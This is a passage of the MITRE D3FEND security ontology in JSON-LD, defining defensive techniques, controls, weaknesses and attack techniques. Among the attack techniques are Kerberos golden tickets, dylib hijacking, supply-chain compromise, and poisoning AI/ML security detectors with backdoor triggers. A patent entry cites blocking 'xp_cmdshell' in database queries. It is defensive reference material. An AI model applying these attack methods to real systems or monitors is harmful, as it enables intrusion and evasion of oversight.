        {
          "@id": "d3f:BroadcastDomainIsolation"
        },
        {
          "@id": "d3f:EncryptedTunnels"
        },
        {
          "@id": "d3f:InboundSessionVolumeAnalysis"
        },
        {
          "@id": "d3f:InboundTrafficFiltering"
        }
      ],
      "rdfs:label": "Network Segmentation"
    },
    {
      "@id": "d3f:HardwareTimerDeviceDriver",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A device driver for a hardware timer.",
      "d3f:drives": {
        "@id": "d3f:HardwareTimer"
      },
      "rdfs:label": "Hardware Timer Device Driver",
      "rdfs:seeAlso": {
        "@id": "https://www.intel.com/content/www/us/en/docs/programmable/743810/25-1/timer-device-drivers.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDriver"
        },
        {
          "@id": "_:N4891ec7a7e4b494bb4fe0678a579813d"
        }
      ]
    },
    {
      "@id": "_:N4891ec7a7e4b494bb4fe0678a579813d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:drives"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareTimer"
      }
    },
    {
      "@id": "d3f:CCI-002724_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, upon detection of a potential integrity violation, initiates one or more of the following actions: generates an audit record; alerts the current user; alerts organization-defined personnel or roles; and/or organization-defined other actions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:PointerAuthentication"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002724"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_IA-2_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Identification and Authentication (organizational Users) | Local Access to Non-privileged Accounts",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "rdfs:label": "IA-2(4)"
    },
    {
      "@id": "d3f:T1408",
      "@type": "owl:Class",
      "d3f:attack-id": "T1408",
      "d3f:definition": "An adversary could use knowledge of the techniques used by security software to evade detection(Citation: Brodie)(Citation: Tan). For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed \"su\" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection(Citation: Rastogi).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1630.003",
      "rdfs:label": "Disguise Root/Jailbreak Indicators - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1630.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Disguise Root/Jailbreak Indicators"
    },
    {
      "@id": "d3f:UserStartupDirectory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:UserStartupScriptFile"
      },
      "d3f:definition": "A user startup directory holds information necessary to start the user's session with the system.",
      "rdfs:label": "User Startup Directory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserLogonInitResource"
        },
        {
          "@id": "_:N41e62c2ef8ca442f82bfc13689e7d647"
        }
      ]
    },
    {
      "@id": "_:N41e62c2ef8ca442f82bfc13689e7d647",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserStartupScriptFile"
      }
    },
    {
      "@id": "d3f:T1157",
      "@type": "owl:Class",
      "d3f:attack-id": "T1157",
      "d3f:definition": "macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1574.004",
      "rdfs:label": "Dylib Hijacking",
      "rdfs:seeAlso": {
        "@id": "d3f:T1574.004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1195.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1195.001",
      "d3f:definition": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)",
      "d3f:modifies": {
        "@id": "d3f:Software"
      },
      "rdfs:label": "Compromise Software Dependencies and Development Tools",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1195"
        },
        {
          "@id": "_:N6f8164f9864f412081776a28b2c6032c"
        }
      ]
    },
    {
      "@id": "_:N6f8164f9864f412081776a28b2c6032c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:T1558.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1558.001",
      "d3f:definition": "Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection)",
      "d3f:forges": {
        "@id": "d3f:KerberosTicketGrantingTicket"
      },
      "rdfs:label": "Golden Ticket",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1558"
        },
        {
          "@id": "_:N504499d01f0a454ea86627122d23d707"
        }
      ]
    },
    {
      "@id": "_:N504499d01f0a454ea86627122d23d707",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:forges"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KerberosTicketGrantingTicket"
      }
    },
    {
      "@id": "d3f:Reference-PlatformFirmwareResiliencyGuidelines_NIST",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-193.pdf"
      },
      "d3f:kb-abstract": "This document provides technical guidelines and recommendations supporting resiliency of platform firmware and data against potentially destructive attacks. The platform is a collection of fundamental hardware and firmware components needed to boot and operate a system. A successful attack on platform firmware could render a system inoperable, perhaps permanently, or requiring reprogramming by the original manufacturer, resulting in significant disruptions to users. The technical guidelines in this document promote resiliency in the platform by describing security mechanisms for protecting the platform against unauthorized changes, detecting unauthorized changes that occur, and recovering from attacks rapidly and securely. Implementers, including Original Equipment Manufacturers (OEMs) and component/device suppliers, can use these guidelines to build stronger security mechanisms into platforms. System administrators, security professionals, and users can use this document to guide procurement strategies and priorities for future systems.",
      "d3f:kb-author": "NIST",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:FirmwareVerification"
      },
      "d3f:kb-reference-title": "Platform Firmware Resiliency Guidelines",
      "rdfs:label": "Reference - Platform Firmware Resiliency Guidelines - NIST"
    },
    {
      "@id": "d3f:Log",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A record of events in the order of their occurrence.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/06515215-n"
      },
      "rdfs:label": "Log",
      "rdfs:seeAlso": {
        "@id": "dbr:Chronology"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:D3FENDCore"
        },
        {
          "@id": "d3f:DigitalInformationBearer"
        }
      ],
      "skos:altLabel": "Chronology"
    },
    {
      "@id": "d3f:EX-0012.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.01",
      "d3f:definition": "Threat actors may target the internal registers of the victim spacecraft in order to modify specific values as the FSW is functioning or prevent certain subsystems from working. Most aspects of the spacecraft rely on internal registers to store important data and temporary values. By modifying these registers at certain points in time, threat actors can disrupt the workflow of the subsystems or onboard payload, causing them to malfunction or behave in an undesired manner.",
      "rdfs:label": "Registers - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Registers"
    },
    {
      "@id": "d3f:T1071.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1071.001",
      "d3f:definition": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.",
      "d3f:may-transfer": {
        "@id": "d3f:CertificateFile"
      },
      "d3f:produces": {
        "@id": "d3f:OutboundInternetWebTraffic"
      },
      "rdfs:label": "Web Protocols",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1071"
        },
        {
          "@id": "_:Nf67771b207704b619cd15e82a2b6cb0f"
        },
        {
          "@id": "_:Nbdebc942eb634178a0f53304ebfffe26"
        }
      ]
    },
    {
      "@id": "_:Nf67771b207704b619cd15e82a2b6cb0f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-transfer"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "_:Nbdebc942eb634178a0f53304ebfffe26",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetWebTraffic"
      }
    },
    {
      "@id": "d3f:Reference-Wikipedia-PIRSensor",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://en.wikipedia.org/wiki/Passive_infrared_sensor"
      },
      "d3f:kb-abstract": "Background on passive infrared sensors, principles of operation, and typical deployment considerations.",
      "d3f:kb-author": "Wikipedia contributors",
      "d3f:kb-reference-of": {
        "@id": "d3f:MotionSensorMonitoring"
      },
      "d3f:kb-reference-title": "Passive infrared sensor",
      "rdfs:label": "Reference - Wikipedia: Passive infrared sensor"
    },
    {
      "@id": "d3f:RelayPatternAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RelayPatternAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "d3f:d3fend-id": "D3-RPA",
      "d3f:definition": "The detection of an internal host relaying traffic between the internal network and the external network.",
      "d3f:kb-article": "## How it works\nA relay may use a variety of proxying, forwarding, or routing technologies to bridge a protected network with an external network. A defensive analytic to detect a relay network may compare the network sessions among multiple hosts. Hosts which have nearly similar network statistics may be part of a relay network. The statistics may include number of bytes sent to and from, time of session initiation, packet size, or packet arrival time data.\n\n## Considerations\n\nComplex intranet VPNs or routing encapsulation may affect the detection analytics.  In addition, unwanted packets might not be forwarded, and additional packets may be added at the relay, further complicating detection.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MaliciousRelayDetectionOnNetworks_VECTRANETWORKSInc"
      },
      "d3f:synonym": "Relay Network Detection",
      "rdfs:label": "Relay Pattern Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:Ne636693c32e04b838eb66e6a113540d2"
        }
      ]
    },
    {
      "@id": "_:Ne636693c32e04b838eb66e6a113540d2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:Pointer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer science, a pointer is a programming language object, whose value refers to (or \"points to\") another value stored elsewhere in the computer memory using its memory address. A pointer references a location in memory, and obtaining the value stored at that location is known as dereferencing the pointer. As an analogy, a page number in a book's index could be considered a pointer to the corresponding page; dereferencing such a pointer would be done by flipping to the page with the given page number.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Pointer_(computer_programming)"
      },
      "rdfs:label": "Pointer",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:CollaborativeSoftware",
      "@type": "owl:Class",
      "d3f:definition": "Collaborative software or groupware is application software designed to help people working on a common task to attain their goals. One of the earliest definitions of groupware is \"intentional group processes plus software to support them\". Collaborative software is a broad concept that overlaps considerably with computer-supported cooperative work (CSCW). According to Carstensen and Schmidt (1999) groupware is part of CSCW. The authors claim that CSCW, and thereby groupware, addresses \"how collaborative activities and their coordination can be supported by means of computer systems.\"",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Collaborative_software"
      },
      "rdfs:label": "Collaborative Software",
      "rdfs:subClassOf": {
        "@id": "d3f:UserApplication"
      }
    },
    {
      "@id": "d3f:SecondaryStorage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Secondary memory (storage, hard disk) is the computer component holding information that does not need to be accessed quickly and that needs to be retained long-term.",
      "rdfs:isDefinedBy": {
        "@id": "https://whatis.techtarget.com/definition/memory"
      },
      "rdfs:label": "Secondary Storage",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Computer_data_storage#Secondary_storage"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:Storage"
        }
      ]
    },
    {
      "@id": "d3f:OSAPIAccessProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function for interacting with processes.",
      "d3f:invokes": {
        "@id": "d3f:AccessProcess"
      },
      "rdfs:label": "OS API Access Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N2ecca6f70fa94abea6988d4f16f0bb32"
        }
      ]
    },
    {
      "@id": "_:N2ecca6f70fa94abea6988d4f16f0bb32",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessProcess"
      }
    },
    {
      "@id": "d3f:T1195",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1195",
      "d3f:definition": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.",
      "d3f:modifies": {
        "@id": "d3f:DigitalArtifact"
      },
      "rdfs:label": "Supply Chain Compromise",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "_:Na754d239a7284035b95ae79ba1c28385"
        }
      ]
    },
    {
      "@id": "_:Na754d239a7284035b95ae79ba1c28385",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalArtifact"
      }
    },
    {
      "@id": "d3f:ApplicationConfigurationDatabase",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ApplicationConfigurationDatabaseRecord"
      },
      "d3f:definition": "A database used to hold application configuration data.",
      "rdfs:label": "Application Configuration Database",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationDatabase"
        },
        {
          "@id": "_:N6ab204d8a7b14045835809695a90aa37"
        }
      ]
    },
    {
      "@id": "_:N6ab204d8a7b14045835809695a90aa37",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CWE-285",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-285",
      "d3f:definition": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.",
      "d3f:synonym": "AuthZ",
      "rdfs:label": "Improper Authorization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForInternetSecurity_CylanceInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20120117644A1"
      },
      "d3f:kb-abstract": "A computer implemented method for preventing SQL injection attacks comprises intercepting a web request associated with a web service at a first software hook in a first web service execution context, persisting at least a portion of the intercepted web request in a storage location associated with the first software hook and accessible to at least one additional execution context, intercepting a database query generated by at least one web service processing operation at a second software hook associated with the execution of the query, wherein the query is generated in response to the intercepted web request and the second hook retrieves the persisted portion of the intercepted web request, comparing a portion of the persisted portion of the intercepted web request with at least a portion of the intercepted database query, and determining, prior to the query being executed, whether the query corresponds to a potential SQL injection attack.",
      "d3f:kb-author": "Derek A. Soeder",
      "d3f:kb-mitre-analysis": "This patent describes a technique for detecting SQL injection attacks. Software hooks are installed in a web service or application to intercept function calls, events, or messages that are passed between software components. Each intercepted database query associated with a web request is analyzed character by character, and if it contains a character that would modify the query's syntax, the query is rejected or sanitized. Security rules and policies may also determine rejection. For example, an administrator or developer may implement a rule that rejects any database query that is excessively long or that contains a particular string, such as \"xp_cmdshell\".",
      "d3f:kb-organization": "Cylance Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DatabaseQueryStringAnalysis"
      },
      "d3f:kb-reference-title": "System and method for internet security",
      "rdfs:label": "Reference - System and method for internet security - Cylance Inc"
    },
    {
      "@id": "d3f:CWE-472",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-472",
      "d3f:definition": "The web application does not sufficiently verify inputs that are assumed to be immutable but are actually externally controllable, such as hidden form fields.",
      "d3f:synonym": "Assumed-Immutable Parameter Tampering",
      "rdfs:label": "External Control of Assumed-Immutable Web Parameter",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-471"
        },
        {
          "@id": "d3f:CWE-642"
        }
      ]
    },
    {
      "@id": "d3f:CCI-001199_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileContentRules"
        },
        {
          "@id": "d3f:FileEncryption"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:LocalFilePermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects the confidentiality and/or integrity of organization-defined information at rest.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001199"
    },
    {
      "@id": "d3f:CWE-689",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-689",
      "d3f:definition": "The product, while copying or cloning a resource, does not set the resource's permissions or access control until the copy is complete, leaving the resource exposed to other spheres while the copy is taking place.",
      "rdfs:label": "Permission Race Condition During Resource Copy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-362"
      }
    },
    {
      "@id": "d3f:communicates-with",
      "@type": [
        "owl:ObjectProperty",
        "owl:SymmetricProperty"
      ],
      "d3f:definition": "x communicates-with y: x and y exchange signals or data bidirectionally, enabling mutual awareness, coordination, or interaction.",
      "rdfs:label": "communicates-with",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-PointerAuthenticationOnARMv8.3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.qualcomm.com/media/documents/files/whitepaper-pointer-authentication-on-armv8-3.pdf"
      },
      "d3f:kb-abstract": "The pointer authentication scheme introduced by ARM is a software security primitive that makes it much harder for an attacker to modify protected pointers in memory without being detected. In this document, we will provide more details about the Pointer Authentication mechanism, provide a security analysis, and discuss the implementation of certain software security countermeasures, such as stack protection and control flow integrity, using the Pointer Authentication primitives.",
      "d3f:kb-author": "Qualcomm Technologies, Inc",
      "d3f:kb-organization": "Qualcomm Technologies, Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:PointerAuthentication"
      },
      "d3f:kb-reference-title": "Pointer Authentication on ARMv8.3",
      "rdfs:label": "Reference - Pointer Authentication on ARMv8.3"
    },
    {
      "@id": "d3f:CWE-435",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-435",
      "d3f:definition": "An interaction error occurs when two entities have correct behavior when running independently of each other, but when they are integrated as components in a larger system or process, they introduce incorrect behaviors that may cause resultant weaknesses.",
      "d3f:synonym": [
        "Emergent Fault",
        "Interaction Error"
      ],
      "rdfs:label": "Improper Interaction Between Multiple Correctly-Behaving Entities",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:OTDeviceManagementMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving an OT device management message, used to manage devices and their configurations.",
      "rdfs:label": "OT Device Management Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEvent"
        },
        {
          "@id": "_:N0269fa30974649928c5a18cc38d70c5e"
        }
      ]
    },
    {
      "@id": "_:N0269fa30974649928c5a18cc38d70c5e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeviceManagementMessage"
      }
    },
    {
      "@id": "d3f:CWE-262",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-262",
      "d3f:definition": "The product does not have a mechanism in place for managing password aging.",
      "rdfs:label": "Not Using Password Aging",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:DNSResponseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DNS server responds to a query with resolution data.",
      "rdfs:label": "DNS Response Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DNSEvent"
        },
        {
          "@id": "_:N1c57fbdd2680480e88ac321362837b91"
        }
      ]
    },
    {
      "@id": "_:N1c57fbdd2680480e88ac321362837b91",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DNSQueryEvent"
      }
    },
    {
      "@id": "d3f:T0842",
      "@type": "owl:Class",
      "d3f:attack-id": "T0842",
      "d3f:definition": "Network sniffing is the practice of using a network interface on a computer system to monitor or capture information (Citation: Enterprise ATT&CK January 2018) regardless of whether it is the specified destination for the information.",
      "rdfs:label": "Network Sniffing - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "Network Sniffing"
    },
    {
      "@id": "d3f:ReverseProxyServer",
      "@type": "owl:Class",
      "d3f:definition": "In computer networks, a reverse proxy is a type of proxy server that retrieves resources on behalf of a client from one or more servers. These resources are then returned to the client, appearing as if they originated from the proxy server itself. Unlike a forward proxy, which is an intermediary for its associated clients to contact any server, a reverse proxy is an intermediary for its associated servers to be contacted by any client. In other words, a proxy acts on behalf of the client(s), while a reverse proxy acts on behalf of the server(s); a reverse proxy is usually an internal-facing proxy used as a 'front-end' to control and protect access to a server on a private network.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Reverse_proxy"
      },
      "rdfs:label": "Reverse Proxy Server",
      "rdfs:subClassOf": {
        "@id": "d3f:ProxyServer"
      }
    },
    {
      "@id": "d3f:FileSetPermissionsEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the modification of a file's permissions or access control list (ACL), specifying which users or processes are granted or restricted access.",
      "rdfs:label": "File Set Permissions Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:Nb8bbd95c605e4d50bb4002f48c8baddb"
        }
      ]
    },
    {
      "@id": "_:Nb8bbd95c605e4d50bb4002f48c8baddb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:CWE-338",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-338",
      "d3f:definition": "The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong.",
      "rdfs:label": "Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:CWE-488",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-488",
      "d3f:definition": "The product does not sufficiently enforce boundaries between the states of different sessions, causing data to be provided to, or used by, the wrong session.",
      "rdfs:label": "Exposure of Data Element to Wrong Session",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:MediaGeneration",
      "@type": "owl:Class",
      "owl:disjointWith": {
        "@id": "d3f:Simulation"
      },
      "rdfs:label": "Media Generation",
      "rdfs:subClassOf": {
        "@id": "d3f:Generation"
      }
    },
    {
      "@id": "d3f:REC-0008.01",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0008.01",
      "d3f:definition": "Adversaries seek insight into component sources, screening levels, test histories, and configuration states to prepare pre-delivery manipulation of boards and modules. High-value details include ASIC/FPGA part numbers and stepping, security fuses and life-cycle states, JTAG/SWD access policies, secure-boot and anti-rollback configuration, golden bitstream handling, board layouts and test points, conformal coat practices, and acceptance test procedures with allowable tolerances. Knowledge of substitute/alternate parts, counterfeit screening thresholds, and waiver histories reveals where counterfeit insertion or parametric “near-miss” parts might evade detection. For programmable logic, attackers target synthesis/place-and-route toolchains, IP core versions, and bitstream encryption keys to enable hardware Trojans or debug backdoors that survive functional test. Logistics artifacts (packing lists, RMA workflows, depot addresses) expose moments when custody is thin and tamper opportunities expand.",
      "rdfs:label": "Hardware Recon - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0008/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0008"
      },
      "skos:prefLabel": "Hardware Recon"
    },
    {
      "@id": "d3f:DE-0003.12",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0003.12",
      "d3f:definition": "When security monitoring relies on AI/ML (e.g., anomaly detection on telemetry, RF fingerprints, or command semantics), the training data itself is a target. Data-poisoning introduces crafted examples or labels so the learned model embeds false associations, treating attacker behaviors as normal, or flagging benign patterns instead. Variants include clean-label backdoors keyed to subtle triggers, label flipping that shifts decision boundaries, and biased sampling that suppresses rare-but-critical signatures. Models trained on tainted corpora are later deployed as routine updates; once in service, the adversary presents inputs containing the trigger or profile they primed, and the detector omits or downranks the very behaviors that would reveal the intrusion.",
      "rdfs:label": "Poison AI/ML Training for Evasion - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/12/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0003"
      },
      "skos:prefLabel": "Poison AI/ML Training for Evasion"
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACEATTACH",
      "@type": "owl:Class",
      "d3f:definition": "Attach to the process specified in pid, making it a tracee of the calling process.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_ATTACH",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIAccessProcess"
      }
    },
    {
      "@id": "d3f:CWE-795",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-795",
      "d3f:definition": "The product receives data from an upstream component, but only accounts for special elements at a specified location, thereby missing remaining special elements that may exist before sending it to a downstream component.",
      "rdfs:label": "Only Filtering Special Elements at a Specified Location",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-791"
      }
    },
    {
      "@id": "d3f:CWE-257",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-257",
      "d3f:definition": "The storage of passwords in a recoverable format makes them subject to password reuse attacks by malicious users. In fact, it should be noted that recoverable encrypted passwords provide no significant benefit over plaintext passwords since they are subject not only to reuse by malicious attackers but also by malicious insiders. If a system administrator can recover a password directly, or use a brute force search on the available information, the administrator can use the password on other accounts.",
      "rdfs:label": "Storing Passwords in a Recoverable Format",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-522"
      }
    },
    {
      "@id": "d3f:T1009",
      "@type": "owl:Class",
      "d3f:attack-id": "T1009",
      "d3f:definition": "Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. This will often increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1027.001",
      "rdfs:label": "Binary Padding",
      "rdfs:seeAlso": {
        "@id": "d3f:T1027.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:ControlFlowGraph",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
